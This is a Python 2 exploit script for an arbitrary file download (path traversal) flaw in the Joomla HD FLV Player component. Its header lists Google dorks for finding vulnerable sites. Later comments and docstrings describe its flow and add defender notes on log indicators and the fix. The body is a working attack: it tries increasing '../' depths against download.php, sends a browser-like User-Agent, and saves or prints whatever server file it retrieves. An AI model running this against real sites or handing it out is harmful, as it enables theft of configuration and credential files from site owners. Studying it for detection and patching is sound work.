#!/usr/bin/env python
#
# Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info:
# Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
# The variable "f" is not sanitized.
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/QvBTKFLBQ20
#
#
"""Proof-of-concept checker for the HD FLV Player (com_hdflvplayer) path
traversal in download.php (versions <= 2.1.0.1 per the header above).

Python 2 only: it relies on urllib2, raw_input and print statements.

Flow, as implemented below:
  1. checkurl       - requires an explicit http:// or https:// scheme.
  2. checkcomponent - builds (but never sends - see the note in the function)
                      a request for download.php to "confirm" the component.
  3. checkversion   - fetches mod_hdflvplayer.xml and prints its <version>.
  4. connection     - requests download.php?f=<N x "../"><file> for
                      N = 1..19 and treats any non-empty body that does not
                      contain the PHP "failed to open stream" warning as a hit.

Defender notes:
  * The indicator in web-server / WAF logs is a GET to
    /components/com_hdflvplayer/hdflvplayer/download.php whose "f" parameter
    carries repeated "../" sequences. The User-Agent sent is a plain
    browser-like string, so detection should key on the path and parameter,
    not on the UA.
  * Root cause is download.php serving whatever path "f" names. The
    server-side fix is to resolve the requested name against the intended
    media directory and reject anything outside it; the "fixed component"
    message at the end of connection() assumes a patched release exists.
"""
# Http connection
import urllib, urllib2
# String manipulation
import re
# Time management
import time
# Args management
import optparse
# Error management
import sys

# ASCII-art banner; whitespace inside it is cosmetic only.
banner = """ _______ __ ___ ___ ______ | _ .-----.-----.--------| .---.-. | Y | _ \\ |___| | _ | _ | | | _ | |. 1 |. | \\ |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\ |: 1 | |: | |: 1 / |::.. . | |::.|:. |::.. . / `-------' `--- ---`------' _______ ___ ___ ___ _______ __ | _ | | | Y | | _ | .---.-.--.--.-----.----. |. 1___|. | |. | | |. 1 | | _ | | | -__| _| |. __) |. |___|. | | |. ____|__|___._|___ |_____|__| |: | |: 1 |: 1 | |: | |_____| |::.| |::.. . |\:..
./ |::.| `---' `-------' `---' `---' <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """


# Check url
def checkurl(url):
    """Return url unchanged if it starts with http:// or https://, else exit(1).

    Only the scheme prefix is checked; a trailing slash is not stripped, so
    the later url + '/components/...' concatenation may yield a '//' segment.
    """
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url


def checkcomponent(url,headers):
    """Print whether the component looks present (prints only, returns None).

    NOTE(review): urllib2.Request() only builds the request object; nothing
    in this function calls urlopen(), so no HTTP round trip happens and
    "FOUND" is printed unconditionally. The HTTPError/URLError handlers
    below are effectively unreachable. Treat this check as a no-op.
    """
    try:
        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        print '[X] Connection Error'


def checkversion(url,headers):
    """Fetch the module manifest and print the value of its <version> tag.

    Prints only, returns None. For each line containing "<version>", VER is
    the text between the first ">" and the following "<" on that line, so
    "<version>2.1.0.1</version>" yields "2.1.0.1". If a matching line has no
    closing "<", search() returns None and the .group() call raises an
    uncaught AttributeError. A manifest with no <version> line prints
    nothing; "Unknown" is printed only on an HTTP error.
    """
    try:
        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
        response = urllib2.urlopen(req).readlines()
        for line_version in response:
            if not line_version.find("<version>") == -1:
                VER = re.compile('>(.*?)<').search(line_version).group(1)
                sys.stdout.write("\r[+] Checking Version: "+str(VER))
                print("")
    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Checking Version: Unknown")
    except urllib2.URLError:
        # Unlike checkcomponent, a connection failure here aborts the run.
        print("\n[X] Connection Error")
        sys.exit(1)


def connection(url,headers,pathtrav):
    """Probe download.php with 1..19 "../" prefixes in front of pathtrav.

    Returns True as soon as a response is accepted and the user has chosen
    [D]ownload or [R]ead; otherwise falls through and returns None after
    printing the "not found or fixed" message. One attempt per second.
    """
    char = "../"
    bar = "#"
    s = ""          # accumulated "../" prefix, one more per iteration
    barcount = ""   # progress bar, one "#" per iteration
    for a in range(1,20):
        s += char
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()
        try:
            # Same endpoint checkcomponent builds a request for, now with the
            # unsanitized "f" parameter populated.
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
            response = urllib2.urlopen(req)
            content = response.read()
            # Heuristic: an empty body, or a body carrying the PHP
            # "failed to open stream" warning, means nothing was served at
            # this depth. Anything else is treated as the requested file.
            if content != "" and not "failed to open stream" in content:
                print("\n[!] VULNERABLE")
                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                print("")
                print("[+] Do you want [D]ownload or [R]ead the file?")
                print("[+]")
                sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
                download = set(['d'])
                read = set(['r'])
                # Prompt loop: any answer other than d/r re-prompts; EOFError
                # from raw_input is not handled, so only Ctrl-C/EOF aborts.
                while True:
                    choice = raw_input().lower()
                    if choice in download:
                        # [D] re-fetches the same URL and saves it under the
                        # basename of pathtrav in the current directory.
                        filedown = pathtrav.split('/')[-1]
                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                        print("[!] DOWNLOADED!")
                        print("[!] Check file: "+filedown)
                        return True
                    elif choice in read:
                        # [R] prints the body already held in memory.
                        print("")
                        print content
                        return True
                    else:
                        sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
        except urllib2.HTTPError:
            # An HTTP error status at this depth is expected; try the next one.
            #print '[X] HTTP Error'
            pass
        except urllib2.URLError:
            # Connection-level failure is reported, but the loop continues.
            print '\n[X] Connection Error'
        # Pace the attempts: one request per second.
        time.sleep(1)
    print("\n[X] File not found or fixed component :(")


# --- command line ------------------------------------------------------------
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target',
                       action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file',
                       action="store",
                       help="Insert file to check",
                       )
# remainder (positional args) is never used.
options, remainder = commandList.parse_args()

# Check args: both options are mandatory; otherwise show banner + usage.
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = options.file

# A browser-like User-Agent is sent with every request.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

# Each stage prints its own "\r[+] ..." prefix and then overwrites it.
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)